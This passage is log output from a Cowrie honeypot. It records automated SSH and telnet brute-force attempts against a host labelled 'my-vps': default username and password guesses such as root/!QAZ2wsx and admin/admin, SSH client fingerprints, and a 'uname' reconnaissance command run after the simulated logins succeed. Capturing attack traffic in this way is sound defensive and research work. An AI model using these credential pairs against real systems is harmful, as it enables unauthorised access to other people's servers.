-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:54:46.897794Z","src_ip":"212.227.235.229","session":"7f29e9580db3"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:47.662529Z","src_ip":"212.227.235.229","session":"7f29e9580db3"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:54:48.919044Z","src_ip":"212.227.235.229","session":"7f29e9580db3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34858,"dst_ip":"1.2.3.4","dst_port":22,"session":"7be9cb66e4fd","protocol":"ssh","message":"New connection: 212.227.125.160:34858 (1.2.3.4:22) [session: 7be9cb66e4fd]","sensor":"my-vps","timestamp":"2025-08-28T06:54:56.177707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:54:56.186865Z","src_ip":"212.227.125.160","session":"7be9cb66e4fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:54:56.399887Z","src_ip":"212.227.125.160","session":"7be9cb66e4fd"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:54:57.266904Z","src_ip":"212.227.125.160","session":"7be9cb66e4fd"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:54:58.487655Z","src_ip":"212.227.125.160","session":"7be9cb66e4fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33620,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c4c0a90551b","protocol":"ssh","message":"New connection: 212.227.235.229:33620 (1.2.3.4:22) [session: 1c4c0a90551b]","sensor":"my-vps","timestamp":"2025-08-28T06:55:02.881155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:55:02.882047Z","src_ip":"212.227.235.229","session":"1c4c0a90551b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:55:03.125093Z","src_ip":"212.227.235.229","session":"1c4c0a90551b"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":36006,"dst_ip":"1.2.3.4","dst_port":23,"session":"978988df987b","protocol":"telnet","message":"New connection: 8.222.212.69:36006 (1.2.3.4:23) [session: 978988df987b]","sensor":"my-vps","timestamp":"2025-08-28T06:55:03.423651Z"}
{"eventid":"cowrie.login.failed","username":"elastic","password":"123456","message":"login attempt [elastic/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:55:03.854145Z","src_ip":"212.227.235.229","session":"1c4c0a90551b"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:05.099310Z","src_ip":"212.227.235.229","session":"1c4c0a90551b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39782,"dst_ip":"1.2.3.4","dst_port":22,"session":"ecbf0ebbbbc5","protocol":"ssh","message":"New connection: 212.227.125.160:39782 (1.2.3.4:22) [session: ecbf0ebbbbc5]","sensor":"my-vps","timestamp":"2025-08-28T06:55:12.644359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:55:12.645415Z","src_ip":"212.227.125.160","session":"ecbf0ebbbbc5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:55:12.870054Z","src_ip":"212.227.125.160","session":"ecbf0ebbbbc5"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:55:13.545182Z","src_ip":"212.227.125.160","session":"ecbf0ebbbbc5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:55:14.084973Z","src_ip":"212.227.125.160","session":"ecbf0ebbbbc5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:55:14.085707Z","src_ip":"212.227.125.160","session":"ecbf0ebbbbc5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:14.328460Z","src_ip":"212.227.125.160","session":"ecbf0ebbbbc5"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:14.329492Z","src_ip":"212.227.125.160","session":"ecbf0ebbbbc5"}
{"eventid":"cowrie.session.connect","src_ip":"59.8.52.131","src_port":36880,"dst_ip":"1.2.3.4","dst_port":23,"session":"a32f50f1d37c","protocol":"telnet","message":"New connection: 59.8.52.131:36880 (1.2.3.4:23) [session: a32f50f1d37c]","sensor":"my-vps","timestamp":"2025-08-28T06:55:14.654350Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57200,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2465836870f","protocol":"ssh","message":"New connection: 212.227.235.229:57200 (1.2.3.4:22) [session: e2465836870f]","sensor":"my-vps","timestamp":"2025-08-28T06:55:19.327830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:55:19.328503Z","src_ip":"212.227.235.229","session":"e2465836870f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:55:19.578639Z","src_ip":"212.227.235.229","session":"e2465836870f"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:55:20.330609Z","src_ip":"212.227.235.229","session":"e2465836870f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:55:20.849580Z","src_ip":"212.227.235.229","session":"e2465836870f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:55:20.850562Z","src_ip":"212.227.235.229","session":"e2465836870f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:21.102308Z","src_ip":"212.227.235.229","session":"e2465836870f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:21.103574Z","src_ip":"212.227.235.229","session":"e2465836870f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35512,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2d733f43ac3","protocol":"ssh","message":"New connection: 212.227.125.160:35512 (1.2.3.4:22) [session: e2d733f43ac3]","sensor":"my-vps","timestamp":"2025-08-28T06:55:29.152538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:55:29.153412Z","src_ip":"212.227.125.160","session":"e2d733f43ac3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:55:29.377207Z","src_ip":"212.227.125.160","session":"e2d733f43ac3"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T06:55:30.056371Z","src_ip":"212.227.125.160","session":"e2d733f43ac3"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:31.281799Z","src_ip":"212.227.125.160","session":"e2d733f43ac3"}
{"eventid":"cowrie.session.closed","duration":31.97697377204895,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:35.400533Z","src_ip":"8.222.212.69","session":"978988df987b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41478,"dst_ip":"1.2.3.4","dst_port":22,"session":"159b0dd6af43","protocol":"ssh","message":"New connection: 212.227.235.229:41478 (1.2.3.4:22) [session: 159b0dd6af43]","sensor":"my-vps","timestamp":"2025-08-28T06:55:35.755061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:55:35.755764Z","src_ip":"212.227.235.229","session":"159b0dd6af43"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:55:36.002207Z","src_ip":"212.227.235.229","session":"159b0dd6af43"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T06:55:36.743071Z","src_ip":"212.227.235.229","session":"159b0dd6af43"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:37.992249Z","src_ip":"212.227.235.229","session":"159b0dd6af43"}
{"eventid":"cowrie.session.closed","duration":30.486928939819336,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:45.141028Z","src_ip":"59.8.52.131","session":"a32f50f1d37c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56540,"dst_ip":"1.2.3.4","dst_port":22,"session":"caa69e6ede36","protocol":"ssh","message":"New connection: 212.227.125.160:56540 (1.2.3.4:22) [session: caa69e6ede36]","sensor":"my-vps","timestamp":"2025-08-28T06:55:45.665390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:55:45.666308Z","src_ip":"212.227.125.160","session":"caa69e6ede36"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:55:45.885737Z","src_ip":"212.227.125.160","session":"caa69e6ede36"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:55:46.538559Z","src_ip":"212.227.125.160","session":"caa69e6ede36"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:47.756642Z","src_ip":"212.227.125.160","session":"caa69e6ede36"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55124,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d7d06acc856","protocol":"ssh","message":"New connection: 212.227.235.229:55124 (1.2.3.4:22) [session: 1d7d06acc856]","sensor":"my-vps","timestamp":"2025-08-28T06:55:52.103399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:55:52.104077Z","src_ip":"212.227.235.229","session":"1d7d06acc856"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:55:52.353885Z","src_ip":"212.227.235.229","session":"1d7d06acc856"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-28T06:55:53.103589Z","src_ip":"212.227.235.229","session":"1d7d06acc856"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:55:54.357017Z","src_ip":"212.227.235.229","session":"1d7d06acc856"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46872,"dst_ip":"1.2.3.4","dst_port":22,"session":"df1a05c4dabf","protocol":"ssh","message":"New connection: 212.227.125.160:46872 (1.2.3.4:22) [session: df1a05c4dabf]","sensor":"my-vps","timestamp":"2025-08-28T06:56:02.023107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:56:02.024583Z","src_ip":"212.227.125.160","session":"df1a05c4dabf"}
